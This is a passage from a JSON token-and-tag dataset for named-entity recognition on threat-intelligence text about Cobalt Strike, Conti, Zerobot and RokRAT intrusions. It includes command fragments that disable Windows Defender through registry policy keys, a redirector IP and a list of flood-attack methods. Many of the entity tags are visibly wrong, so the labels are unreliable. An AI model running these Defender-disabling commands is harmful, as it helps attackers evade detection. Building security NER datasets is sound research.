"O" - ] - }, - { - "tokens": [ - "To", - "evade", - "detection,", - "the", - "threat", - "actors", - "disabled", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "disabled", - "Windows", - "Defender", - "via", - "a", - "group", - "policy", - "modification." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "adding", - "the", - "below", - "to", - "an", - "already", - "linked", - "GPO." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "then", - "force", - "updated", - "the", - "GPO", - "on", - "all", - "clients", - "using", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "Beacon", - "was", - "dropped", - "and", - "executed", - "on", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "was", - "executed", - "via", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "including", - "the", - "computer", - "name", - "and", - "the", - "OS", - "version", - "of", - "the", - "compromised", - "system", - "were", - "sent" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C", - "reg", - "add" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "Defender\\DisableAntiSpyware", - "DeleteValue" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "Defender\\Real-Time", - "Monitoring\\DisableRealtimeMonitoring", - "DeleteValue" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "Defender\\Real-Time", - "Monitoring\\DisableBehaviorMonitoring", - "DeleteValue" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "Defender\\Real-Time", - "Monitoring\\DisableIntrusionPreventionSystem", - "DeleteValue" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "Defender\\Real-Time", - "Protection", - "DeleteKey" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "used", - "a", - "redirector", - "(38.135.122[.]194:8080)", - "to", - "proxy", - "the", - "RDP", - "traffic", - "being", - "passed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "proxied", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "was", - "accessed", - "by", - "an", - "unusual", - "process", - "“runonce.exe”", - "on", - "multiple", - "hosts,", - "including", - "a", - "domain", - "controller." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "systems", - "injected", - "the", - "Conti", - "DLL", - "into", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "web", - "application", - "vulnerabilities" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploiting", - "vulnerabilities", - "in", - "Apache", - "and", - "Apache", - "Spark", - "(CVE-2021-42013", - "and", - "CVE-2022-33891" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "GrandstreamCVE-2020-25223WebAdmin", - "of", - "Sophos", - "SG", - "UTMCVE-2021-42013ApacheCVE-2022-31137Roxy-WICVE-2022-33891Apache", - "SparkZSL-" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "CVE-2018-12613,", - "a", - "phpMyAdmin", - "vulnerability", - "that", - "could", - "allow", - "threat", - "actors", - "to", - "view", - "or", - "execute", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "propagating", - "through", - "brute", - "force", - "attacks", - "on", - "vulnerable", - "devices", - "with", - "insecure", - "configurations", - "that", - "use", - "default", - "or", - "weak", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "default", - "or", - "weak", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "combination", - "of", - "eight", - "common", - "usernames", - "and", - "130", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "downloads" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "Zerobot", - "binary" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "download", - "and", - "execute", - "binaries", - "of", - "various", - "architectures", - "until", - "it", - "succeeds" - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "this", - "RAT," - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "identify", - "the", - "architecture" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "copies", - "itself", - "to", - "the", - "Startup", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "methodDescriptionUDP_LEGITSends", - "UDP", - "packets", - "without", - "data" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TCP_HANDSHAKEFloods", - "with", - "TCP", - "handshakes.TCP_SOCKETContinuously", - "sends", - "random", - "payloads", - "on", - "an", - "open", - "TCP", - "socket." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TLS_SOCKETContinuously", - "sends", - "random", - "payloads", - "on", - "an", - "open", - "TLS", - "socket." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "methodDescriptionUDP_RAWSends", - "UDP", - "packets", - "where", - "the", - "payload", - "is", - "customizable.ICMP_FLOODSupposed", - "to", - "be", - "an", - "ICMP", - "flood,", - "but", - "the", - "packet", - "is", - "built", - "incorrectly.TCP_CUSTOMSends", - "TCP", - "packets", - "where", - "the", - "payload", - "and", - "flags", - "are", - "fully", - "customizable.TCP_SYNSends", - "SYN", - "packets.TCP_ACKSends", - "ACK", - "packets.TCP_SYNACKSends", - "SYN-ACK", - "packets.TCP_XMASChristmas", - "tree", - "attack", - "(all", - "TCP", - "flags", - "are", - "set)." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP_HANDLESends", - "HTTP", - "GET", - "requests", - "using", - "a", - "Golang", - "standard", - "library.HTTP_RAWFormats", - "and", - "sends", - "HTTP", - "GET", - "requests.HTTP_BYPASSSends", - "HTTP", - "GET", - "requests", - "with", - "spoofed", - "headers.HTTP_NULLHTTP", - "headers", - "are", - "each", - "one", - "random", - "byte", - "(" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Zerobot", - "HTTP", - "requests" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "open-source", - "remote", - "administration", - "tool", - "(RAT)", - "with", - "various", - "features", - "such", - "as", - "managing", - "processes,", - "file", - "operations,", - "screenshotting,", - "and", - "running", - "commands." - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "I-Features", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "running", - "commands" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "screenshotting," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "This", - "attachment", - "(unless", - "zipped)", - "is", - "the", - "MyDoom", - "executable." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "executables", - "attached", - "to", - "its", - "phishing", - "e-mails", - "have", - "an", - "extension", - "hidden", - "by", - "default", - "by", - "most", - "Windows", - "deployments", - "(.cmd,", - ".scr,", - ".com,", - "etc.)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "is", - "a", - "32-bit", - "Windows", - "executable", - "packed", - "using", - "the", - "UPX", - "(Ultimate", - "Packer", - "for", - "Executables)", - "packer", - "(https://en.wikipedia.org/wiki/UPX)", - "to", - "compress", - "and", - "make", - "it", - "more", - "difficult", - "to", - "analyze." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "packer", - "decompresses", - "and", - "executes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upon", - "execution,", - "an", - "attempt", - "to", - "alter", - "the", - "Windows", - "firewall", - "settings", - "is", - "made." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "makes", - "a", - "copy", - "of", - "itself,", - "places", - "it", - "in", - "the", - "“Temp”", - "folder", - "(C:\\Users\\<user>\\AppData\\Local\\Temp),", - "and", - "changes", - "the", - "name", - "to", - "a", - "known", - "Windows", - "application/process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "activity", - "thereafter", - "included", - "dumps", - "of", - "LSASS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "enumerations." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "launched", - "by", - "cmd.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "executable", - "‘3ujwy2rz7v.exe’", - "was", - "downloaded" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "uses", - "command", - "and", - "control", - "servers", - "to", - "collect", - "information", - "on", - "compromised", - "systems" - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "user", - "had", - "to", - "click", - "on", - "this", - "in", - "order", - "to", - "execute", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "immediately", - "begins", - "to", - "look", - "for", - "EDR", - "and", - "antivirus", - "software." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Phishing", - "emails", - "spoof", - "legitimate", - "senders", - "to", - "deliver", - "RokRAT", - "via", - "LNK", - "files" - ], - "ner_tags": [ - "B-Tool", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Email", - "attachments", - "mimic", - "legitimate", - "documents" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "several", - "Zip", - "Archives", - "files", - "hosting", - "multiple", - "lure", - "documents", - "likely", - "sent", - "via", - "phishing", - "campaigns" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "targets", - "for", - "phishing", - "emails", - "containing", - "this", - "type", - "of", - "decoy", - "document." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "campaigns", - "typically", - "begin", - "with", - "a", - "phishing", - "email", - "with", - "a", - "ZIP", - "file", - "attachment,", - "containing", - "a", - "LNK", - "file", - "disguised", - "as", - "a", - "Word", - "document" - ], - "ner_tags": [ - "B-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "containing", - "obfuscated", - "PowerShell", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "obfuscation", - "technique", - "for", - "the", - "dropped", - "files", - "being", - "hex-encoding", - "vs.", - "string", - "concatenation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contain", - "an", - "encoded", - "PowerShell," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "scripts", - "in", - "charge", - "of", - "downloading", - "a", - "second", - "stage", - "RokRAT", - "shellcode" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "file", - "download/upload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "start", - "the", - "download", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Optical", - "Disc", - "Image", - "files", - "(ISO)", - "containing", - "LNK", - "files", - "that", - "had", - "slightly", - "modified", - "PowerShell", - "scripts,", - "and", - "Hangul", - "Word", - "Processor", - "decoy", - "documents" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "The", - "ISO", - "files", - "that", - "X-Force", - "observed", - "contained", - "a", - "LNK", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "a", - "JPEG", - "decoy", - "file", - "are", - "dropped" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "JPEG", - "decoy", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "drop", - "batch", - "files" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "then", - "the", - "payload", - "is", - "executed", - "using", - "Windows", - "API", - "functions", - "(VirtualProtect)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "that", - "is", - "decoded", - "using", - "the", - "first", - "byte", - "as", - "a", - "key," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packed", - "into", - "a", - "Windows", - "executable", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stealing", - "sensitive", - "data", - "from", - "the", - "victim’s", - "networks." - ], - "ner_tags": [ - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "identifies", - "data", - "of", - "interest", - "from", - "the", - "network", - "of", - "the", - "victim" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "can", - "be", - "anything", - "from", - "file", - "and", - "directory-listings,", - "configuration", - "files,", - "manuals,", - "email", - "stores", - "in", - "the", - "guise", - "of", - "OST-", - "and", - "PST-files,", - "file", - "shares", - "with", - "intellectual", - "property", - "(IP),", - "and", - "data", - "scraped", - "from", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "collected", - "the", - "data", - "from", - "various", - "sources", - "within", - "the", - "victim’s", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Credential", - "theft", - "and", - "password", - "spraying" - ], - "ner_tags": [ - "B-SamFile", - "B-Purp", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "password", - "spraying", - "attack", - "against", - "the", - "victim’s", - "remote", - "services," - ], - "ner_tags": [ - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "this", - "list", - "of", - "administrator-accounts,", - "the", - "adversary", - "performs", - "another", - "password", - "spraying", - "attack", - "until", - "a", - "valid", - "admin", - "account", - "is", - "compromised" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "adversary", - "started", - "a", - "password", - "spraying", - "attack", - "against", - "those", - "domain", - "admin", - "accounts," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "user", - "account", - "was", - "possibly", - "compromised", - "on", - "the", - "Linux", - "server", - "by", - "using", - "credential", - "stuffing", - "or", - "password", - "spraying:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Logfiles", - "on", - "the", - "Linux-system", - "show", - "traces", - "which", - "can", - "be", - "attributed", - "to", - "a", - "credential", - "stuffing", - "or", - "password", - "spraying", - "attack." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Password", - "spraying" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "or", - "password", - "spraying." - ], - "ner_tags": [ - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "This", - "adversary", - "starts", - "with", - "obtaining", - "usernames" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "The", - "built-in", - "Windows", - "quser-command", - "to", - "show", - "logged", - "on", - "users", - "is", - "also", - "heavily", - "used", - "by", - "them." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "identify", - "if", - "privileged", - "users", - "are", - "active", - "on", - "remote", - "servers,", - "the", - "adversary", - "makes", - "use", - "of", - "PsLogList", - "from", - "Microsoft", - "Sysinternals" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "identify", - "if", - "privileged", - "users", - "are", - "active", - "on", - "the", - "systems" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "credentials", - "are", - "used", - "in", - "a", - "credential", - "stuffing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "user", - "account", - "was", - "possibly", - "compromised", - "on", - "the", - "Linux", - "server", - "by", - "using", - "credential", - "stuffing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Logfiles", - "on", - "the", - "Linux-system", - "show", - "traces", - "which", - "can", - "be", - "attributed", - "to", - "a", - "credential", - "stuffing", - "or", - "password", - "spraying", - "attack." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "credential", - "stuffing" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "more", - "specifically", - "by", - "credential", - "stuffing" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "After", - "obtaining", - "a", - "valid", - "account,", - "they", - "use", - "this", - "account", - "to", - "access", - "the", - "victim’s", - "VPN,", - "Citrix", - "or", - "another", - "remote", - "service", - "that", - "allows", - "access", - "to", - "the", - "network", - "of", - "the", - "victim." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "this", - "valid", - "admin", - "account,", - "a", - "Cobalt", - "Strike", - "beacon", - "is", - "loaded", - "into", - "memory", - "of", - "patient", - "zero." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "used", - "the", - "valid", - "account", - "to", - "directly", - "login" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "used", - "valid", - "accounts", - "against", - "remote", - "services:" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "accessed", - "the", - "company", - "portal", - "with", - "the", - "valid", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cloud", - "drive,", - "or", - "other", - "cloud", - "resources", - "accessible", - "by", - "the", - "compromised", - "account." - ], - "ner_tags": [ - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "now", - "armed", - "with", - "the", - "valid", - "account,", - "was", - "able", - "to", - "access", - "a", - "document", - "stored", - "in", - "SharePoint", - "Online,", - "part", - "of", - "Microsoft", - "Office", - "365." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "starts", - "using", - "the", - "Cobalt", - "Strike", - "beacon", - "for", - "remote", - "access", - "and", - "command", - "and", - "control." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "obtained", - "valid", - "account", - "is", - "already", - "member", - "of", - "the", - "domain", - "admins", - "group,", - "the", - "first", - "lateral", - "move", - "in", - "the", - "network", - "is", - "usually", - "to", - "a", - "domain", - "controller" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "this", - "the", - "adversary", - "dumps", - "the", - "domain", - "admin", - "credentials", - "from", - "the", - "memory", - "of", - "this", - "machine,", - "continues", - "lateral", - "moving", - "through", - "the", - "network," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "finds", - "the", - "trust", - "relationships", - "and", - "jump", - "hosts,", - "attempting", - "to", - "move", - "into", - "the", - "other", - "domains", - "and", - "security", - "zones." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "successfully", - "got", - "a", - "valid", - "domain", - "admin", - "account", - "this", - "way." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "other", - "cases,", - "the", - "adversary", - "moved", - "laterally", - "to", - "another", - "system", - "with", - "a", - "domain", - "admin", - "logged", - "in." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "can", - "be", - "anything", - "from", - "file", - "and", - "directory-listings," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "copying", - "results", - "of", - "the", - "discovery", - "phase,", - "like", - "file-", - "and", - "directory", - "lists", - "from", - "local", - "systems," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "data", - "is", - "small", - "enough,", - "it", - "is", - "exfiltrated", - "through", - "the", - "command", - "and", - "control", - "channel", - "of", - "the", - "Cobalt", - "Strike", - "beacons." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "adversary", - "uses", - "the", - "command", - "and", - "control", - "channel", - "to", - "exfiltrate", - "small", - "amounts", - "of", - "data." - ], - 